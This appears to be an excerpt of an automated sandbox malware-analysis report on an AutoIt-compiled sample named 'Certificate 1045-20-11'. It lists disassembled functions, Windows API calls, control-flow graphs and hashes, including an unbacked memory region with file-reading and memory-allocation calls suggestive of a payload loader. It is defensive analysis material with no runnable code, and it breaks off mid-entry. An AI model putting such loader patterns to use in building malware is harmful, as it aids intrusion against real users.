                                                                                • _wcscat.LIBCMT ref: 0088C0A9
                                                                                • __wsplitpath.LIBCMT ref: 0088C0CE
                                                                                • _wcscat.LIBCMT ref: 0088C0E4
                                                                                • _wcscat.LIBCMT ref: 0088C0F7
                                                                                • _wcscmp.LIBCMT ref: 0088C03E
                                                                                  • Part of subcall function 0088C56D: _wcscmp.LIBCMT ref: 0088C65D
                                                                                  • Part of subcall function 0088C56D: _wcscmp.LIBCMT ref: 0088C670
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0088C2A1
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0088C338
                                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0088C34E
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0088C35F
                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0088C371
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                • String ID:
                                                                                • API String ID: 2378138488-0
                                                                                • Opcode ID: d603a6279340f421b839fb33e594d8c59f5a0a555e8513fcac2f7cd2b38d5579
                                                                                • Instruction ID: 326cb36cedf085c2dd081cc08a0a17b9c1f6e28126efa053474f5f72531b7497
                                                                                • Opcode Fuzzy Hash: d603a6279340f421b839fb33e594d8c59f5a0a555e8513fcac2f7cd2b38d5579
                                                                                • Instruction Fuzzy Hash: 63C12CB1900219AFDF11EFA9CC85EDEB7B8FF49310F1040A6F609E6255DB709A848F65
                                                                                Function 00843742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 958 843742-843762 960 843764-843767 958->960 961 8437c2-8437c4 958->961 963 8437c8 960->963 964 843769-843770 960->964 961->960 962 8437c6 961->962 965 8437ab-8437b3 DefWindowProcW 962->965 966 8437ce-8437d1 963->966 967 8b1e00-8b1e2e call 842ff6 call 85e312 963->967 968 843776-84377b 964->968 969 84382c-843834 PostQuitMessage 964->969 971 8437b9-8437bf 965->971 972 8437f6-84381d SetTimer RegisterWindowMessageW 966->972 973 8437d3-8437d4 966->973 1001 8b1e33-8b1e3a 967->1001 975 8b1e88-8b1e9c call 884ddd 968->975 976 843781-843783 968->976 970 8437f2-8437f4 969->970 970->971 972->970 977 84381f-84382a CreatePopupMenu 972->977 981 8b1da3-8b1da6 973->981 982 8437da-8437ed KillTimer call 843847 call 84390f 973->982 975->970 995 8b1ea2 975->995 978 843836-843840 call 85eb83 976->978 979 843789-84378e 976->979 977->970 996 843845 978->996 985 843794-843799 979->985 986 8b1e6d-8b1e74 979->986 989 8b1da8-8b1daa 981->989 990 8b1ddc-8b1dfb MoveWindow 981->990 982->970 993 8b1e58-8b1e68 call 8855bd 985->993 994 84379f-8437a5 985->994 986->965 1000 8b1e7a-8b1e83 call 87a5f3 986->1000 997 8b1dcb-8b1dd7 SetFocus 989->997 998 8b1dac-8b1daf 989->998 990->970 993->970 994->965 994->1001 995->965 996->970 997->970 998->994 1002 8b1db5-8b1dc6 call 842ff6 998->1002 1000->965 1001->965 1006 8b1e40-8b1e53 call 843847 call 844ffc 1001->1006 1002->970 1006->965
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 008437B3
                                                                                • KillTimer.USER32(?,00000001), ref: 008437DD
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00843800
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0084380B
                                                                                • CreatePopupMenu.USER32 ref: 0084381F
                                                                                • PostQuitMessage.USER32(00000000), ref: 0084382E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: cf61cd68913a1cc8407b51652ab609866be85f38786b6ddf59ebeb1a87d2274c
                                                                                • Instruction ID: 058d9a0f929e15bda1cc6610afcfdc2e5ffc2f0526f55a92b8c1cced218b9e18
                                                                                • Opcode Fuzzy Hash: cf61cd68913a1cc8407b51652ab609866be85f38786b6ddf59ebeb1a87d2274c
                                                                                • Instruction Fuzzy Hash: FA4106F111834DAFDF246F689C4EFBA36A5FB14305F440135FA82D62A1DB709E40A762
                                                                                Function 00843E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00843E79
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00843E88
                                                                                • LoadIconW.USER32(00000063), ref: 00843E9E
                                                                                • LoadIconW.USER32(000000A4), ref: 00843EB0
                                                                                • LoadIconW.USER32(000000A2), ref: 00843EC2
                                                                                  • Part of subcall function 00844024: LoadImageW.USER32(00840000,00000063,00000001,00000010,00000010,00000000), ref: 00844048
                                                                                • RegisterClassExW.USER32(?), ref: 00843F30
                                                                                  • Part of subcall function 00843F53: GetSysColorBrush.USER32(0000000F), ref: 00843F86
                                                                                  • Part of subcall function 00843F53: RegisterClassExW.USER32(00000030), ref: 00843FB0
                                                                                  • Part of subcall function 00843F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00843FC1
                                                                                  • Part of subcall function 00843F53: InitCommonControlsEx.COMCTL32(?), ref: 00843FDE
                                                                                  • Part of subcall function 00843F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00843FEE
                                                                                  • Part of subcall function 00843F53: LoadIconW.USER32(000000A9), ref: 00844004
                                                                                  • Part of subcall function 00843F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00844013
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: bd1a073773a26f35d9b85364bbfb073de507a0562b1c6cc3e41ea9c69e4159c0
                                                                                • Instruction ID: af1b089cd4566f282aef1394a8a3b051139a56a91081fa2f050e4802748c35b5
                                                                                • Opcode Fuzzy Hash: bd1a073773a26f35d9b85364bbfb073de507a0562b1c6cc3e41ea9c69e4159c0
                                                                                • Instruction Fuzzy Hash: 7A2135B0D18304AFCB44DFA9EC45A99BFF9FB48310F00412AE614E72A0D77546449F91
                                                                                Function 0086ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1022 86acb3-86ace0 call 866ac0 call 867cf4 call 866986 1029 86ace2-86acf8 call 86e880 1022->1029 1030 86acfd-86ad02 1022->1030 1038 86af52-86af57 call 866b05 1029->1038 1032 86ad08-86ad0f 1030->1032 1033 86ad42-86ad51 GetStartupInfoW 1032->1033 1034 86ad11-86ad40 1032->1034 1036 86ad57-86ad5c 1033->1036 1037 86ae80-86ae86 1033->1037 1034->1032 1036->1037 1040 86ad62-86ad79 1036->1040 1041 86af44-86af50 call 86af58 1037->1041 1042 86ae8c-86ae9d 1037->1042 1044 86ad80-86ad83 1040->1044 1045 86ad7b-86ad7d 1040->1045 1041->1038 1046 86aeb2-86aeb8 1042->1046 1047 86ae9f-86aea2 1042->1047 1049 86ad86-86ad8c 1044->1049 1045->1044 1051 86aebf-86aec6 1046->1051 1052 86aeba-86aebd 1046->1052 1047->1046 1050 86aea4-86aead 1047->1050 1055 86adae-86adb6 1049->1055 1056 86ad8e-86ad9f call 866986 1049->1056 1057 86af3e-86af3f 1050->1057 1054 86aec9-86aed5 GetStdHandle 1051->1054 1052->1054 1058 86aed7-86aed9 1054->1058 1059 86af1c-86af32 1054->1059 1061 86adb9-86adbb 1055->1061 1067 86ada5-86adab 1056->1067 1068 86ae33-86ae3a 1056->1068 1057->1037 1058->1059 1062 86aedb-86aee4 GetFileType 1058->1062 1059->1057 1064 86af34-86af37 1059->1064 1061->1037 1065 86adc1-86adc6 1061->1065 1062->1059 1066 86aee6-86aef0 1062->1066 1064->1057 1069 86ae20-86ae31 1065->1069 1070 86adc8-86adcb 1065->1070 1071 86aef2-86aef8 1066->1071 1072 86aefa-86aefd 1066->1072 1067->1055 1073 86ae40-86ae4e 1068->1073 1069->1061 1070->1069 1074 86adcd-86add1 1070->1074 1076 86af05 1071->1076 1077 86aeff-86af03 1072->1077 1078 86af08-86af1a InitializeCriticalSectionAndSpinCount 1072->1078 1079 86ae74-86ae7b 1073->1079 1080 86ae50-86ae72 1073->1080 1074->1069 1075 86add3-86add5 1074->1075 1081 86add7-86ade3 GetFileType 1075->1081 1082 86ade5-86ae1a InitializeCriticalSectionAndSpinCount 1075->1082 1076->1078 1077->1076 1078->1057 1079->1049 1080->1073 1081->1082 1083 86ae1d 1081->1083 1082->1083 1083->1069
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 0086ACC1
                                                                                  • Part of subcall function 00867CF4: __mtinitlocknum.LIBCMT ref: 00867D06
                                                                                  • Part of subcall function 00867CF4: EnterCriticalSection.KERNEL32(00000000,?,00867ADD,0000000D), ref: 00867D1F
                                                                                • __calloc_crt.LIBCMT ref: 0086ACD2
                                                                                  • Part of subcall function 00866986: __calloc_impl.LIBCMT ref: 00866995
                                                                                  • Part of subcall function 00866986: Sleep.KERNEL32(00000000,000003BC,0085F507,?,0000000E), ref: 008669AC
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0086ACED
                                                                                • GetStartupInfoW.KERNEL32(?,008F6E28,00000064,00865E91,008F6C70,00000014), ref: 0086AD46
                                                                                • __calloc_crt.LIBCMT ref: 0086AD91
                                                                                • GetFileType.KERNEL32(00000001), ref: 0086ADD8
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0086AE11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1426640281-0
                                                                                • Opcode ID: f3647b90ba2ad487444f8f144c23f1f6c89ff274e404e49c394df1fee3ac9331
                                                                                • Instruction ID: 95bb3613c36372a52da9239534ba4abec5ff863fbc8e5600ebfcebf934cf316e
                                                                                • Opcode Fuzzy Hash: f3647b90ba2ad487444f8f144c23f1f6c89ff274e404e49c394df1fee3ac9331
                                                                                • Instruction Fuzzy Hash: 99819CB19052458FDB18CF68C8805A9BBF0FF49324B25426ED4A6FB3D1D7359802DF56
                                                                                Function 00EB0168 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1084 eb0168-eb0216 call eadb58 1087 eb021d-eb0243 call eb1078 CreateFileW 1084->1087 1090 eb024a-eb025a 1087->1090 1091 eb0245 1087->1091 1098 eb025c 1090->1098 1099 eb0261-eb027b VirtualAlloc 1090->1099 1092 eb0395-eb0399 1091->1092 1094 eb03db-eb03de 1092->1094 1095 eb039b-eb039f 1092->1095 1100 eb03e1-eb03e8 1094->1100 1096 eb03ab-eb03af 1095->1096 1097 eb03a1-eb03a4 1095->1097 1101 eb03bf-eb03c3 1096->1101 1102 eb03b1-eb03bb 1096->1102 1097->1096 1098->1092 1103 eb027d 1099->1103 1104 eb0282-eb0299 ReadFile 1099->1104 1105 eb03ea-eb03f5 1100->1105 1106 eb043d-eb0452 1100->1106 1109 eb03d3 1101->1109 1110 eb03c5-eb03cf 1101->1110 1102->1101 1103->1092 1111 eb029b 1104->1111 1112 eb02a0-eb02e0 VirtualAlloc 1104->1112 1113 eb03f9-eb0405 1105->1113 1114 eb03f7 1105->1114 1107 eb0462-eb046a 1106->1107 1108 eb0454-eb045f VirtualFree 1106->1108 1108->1107 1109->1094 1110->1109 1111->1092 1115 eb02e2 1112->1115 1116 eb02e7-eb0302 call eb12c8 1112->1116 1117 eb0419-eb0425 1113->1117 1118 eb0407-eb0417 1113->1118 1114->1106 1115->1092 1124 eb030d-eb0317 1116->1124 1120 eb0432-eb0438 1117->1120 1121 eb0427-eb0430 1117->1121 1119 eb043b 1118->1119 1119->1100 1120->1119 1121->1119 1125 eb034a-eb035e call eb10d8 1124->1125 1126 eb0319-eb0348 call eb12c8 1124->1126 1132 eb0362-eb0366 1125->1132 1133 eb0360 1125->1133 1126->1124 1134 eb0368-eb036c CloseHandle 1132->1134 1135 eb0372-eb0376 1132->1135 1133->1092 1134->1135 1136 eb0378-eb0383 VirtualFree 1135->1136 1137 eb0386-eb038f 1135->1137 1136->1137 1137->1087 1137->1092
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EB0239
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EB045F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID: S
                                                                                • API String ID: 204039940-2719959225
                                                                                • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                • Instruction ID: dea362163815c27de6f898fbb1748d17a6e6cb39f16aed1eea4d0fa33bb694bf
                                                                                • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                • Instruction Fuzzy Hash: 8CA10770E00209EBDB14CFA4C998BEFB7B5BF48304F209159E615BB291D775AA85CB50
                                                                                Function 008449FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1193 8449fb-844a25 call 84bcce RegOpenKeyExW 1196 8b41cc-8b41e3 RegQueryValueExW 1193->1196 1197 844a2b-844a2f 1193->1197 1198 8b4246-8b424f RegCloseKey 1196->1198 1199 8b41e5-8b4222 call 85f4ea call 8447b7 RegQueryValueExW 1196->1199 1204 8b423d-8b4245 call 8447e2 1199->1204 1205 8b4224-8b423b call 846a63 1199->1205 1204->1198 1205->1204
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00844A1D
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008B41DB
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008B421A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 008B4249
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                • API String ID: 1586453840-614718249
                                                                                • Opcode ID: 7572ab3ae75da68efc92a77f45f4832693b853f79f0e7523aef4f52709bed848
                                                                                • Instruction ID: 20b39adf057b4af8d51da6b0b47c7fd01ed924e4e8d26abe27cce3d36d1d819e
                                                                                • Opcode Fuzzy Hash: 7572ab3ae75da68efc92a77f45f4832693b853f79f0e7523aef4f52709bed848
                                                                                • Instruction Fuzzy Hash: B9113D71A0020DBEEB04EBA8CD86EFF7BBCFF04344F101069B506D6291EA709E469B50
                                                                                Function 008436B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1220 8436b8-843728 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008436E6
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00843707
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00843AA3,?), ref: 0084371B
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00843AA3,?), ref: 00843724
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: be5c577193b85597c2390900008f06b1122c8a3305f74374ab0faa6307a65dc7
                                                                                • Instruction ID: 18d2a1b99a590c032e66f54e5ebf1a61e71d1ebfe6582d7214acdcd07abcc590
                                                                                • Opcode Fuzzy Hash: be5c577193b85597c2390900008f06b1122c8a3305f74374ab0faa6307a65dc7
                                                                                • Instruction Fuzzy Hash: CEF03A705542D0BEE7306757AC48E672EBEE7C6F20B01802FFA04A22A0C5711895EAB0
                                                                                Function 00EAFF08 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1325 eaff08-eb0060 call eadb58 call eafdf8 CreateFileW 1332 eb0062 1325->1332 1333 eb0067-eb0077 1325->1333 1334 eb0117-eb011c 1332->1334 1336 eb0079 1333->1336 1337 eb007e-eb0098 VirtualAlloc 1333->1337 1336->1334 1338 eb009a 1337->1338 1339 eb009c-eb00b3 ReadFile 1337->1339 1338->1334 1340 eb00b7-eb00f1 call eafe38 call eaedf8 1339->1340 1341 eb00b5 1339->1341 1346 eb010d-eb0115 ExitProcess 1340->1346 1347 eb00f3-eb0108 call eafe88 1340->1347 1341->1334 1346->1334 1347->1346
                                                                                APIs
                                                                                  • Part of subcall function 00EAFDF8: Sleep.KERNELBASE(000001F4), ref: 00EAFE09
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EB0056
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: WC1ZWF270H95AP8B
                                                                                • API String ID: 2694422964-790463931
                                                                                • Opcode ID: af67d319f7180167a9413278e681dc6fe5db51006b3dd26f50d334adfec864eb
                                                                                • Instruction ID: 78d93647f8a2155a78b58b57051647f3d6d61c53114553399f4617fc03653974
                                                                                • Opcode Fuzzy Hash: af67d319f7180167a9413278e681dc6fe5db51006b3dd26f50d334adfec864eb
                                                                                • Instruction Fuzzy Hash: 32519030E14248DBEB11DBE4C854BEFBBB9AF19304F009599E248BB2C1D7B91B45CB65
                                                                                Function 008451AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0084522F
                                                                                • _wcscpy.LIBCMT ref: 00845283
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00845293
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008B3CB0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                • String ID: Line:
                                                                                • API String ID: 1053898822-1585850449
                                                                                • Opcode ID: fd6ec764cd87273464a704514b6fe4610a1e2821679b4904a8e338ecac1185a1
                                                                                • Instruction ID: 33dafb27a2e7284bb12dece8527dae586fcd4e3270eb092365c7f5d458a28ccd
                                                                                • Opcode Fuzzy Hash: fd6ec764cd87273464a704514b6fe4610a1e2821679b4904a8e338ecac1185a1
                                                                                • Instruction Fuzzy Hash: D3319C71408748AFD321EB64DC42FDE77E8FB44314F00461AF599D2192EBB4A658CB97
                                                                                Function 00844139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 008441A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008439FE,?,00000001), ref: 008441DB
                                                                                • _free.LIBCMT ref: 008B36B7
                                                                                • _free.LIBCMT ref: 008B36FE
                                                                                  • Part of subcall function 0084C833: __wsplitpath.LIBCMT ref: 0084C93E
                                                                                  • Part of subcall function 0084C833: _wcscpy.LIBCMT ref: 0084C953
                                                                                  • Part of subcall function 0084C833: _wcscat.LIBCMT ref: 0084C968
                                                                                  • Part of subcall function 0084C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0084C978
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                • API String ID: 805182592-1757145024
                                                                                • Opcode ID: e99b61add636431a572c076096f6549a8cab5a722728220e14469c30f51b9b72
                                                                                • Instruction ID: d61c9de2db7cf85736a99feda35cb6210b01893ccefdf1e46b953e9fa42857fb
                                                                                • Opcode Fuzzy Hash: e99b61add636431a572c076096f6549a8cab5a722728220e14469c30f51b9b72
                                                                                • Instruction Fuzzy Hash: A5912A7191021DAFCF14EFA8CC919EEBBB4FF19310F14442AE816EB291DB74AA45CB51
                                                                                Function 00844A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00845374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00901148,?,008461FF,?,00000000,00000001,00000000), ref: 00845392
                                                                                  • Part of subcall function 008449FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00844A1D
                                                                                • _wcscat.LIBCMT ref: 008B2D80
                                                                                • _wcscat.LIBCMT ref: 008B2DB5
                                                                                Strings
                                                                                Memory Dump Source
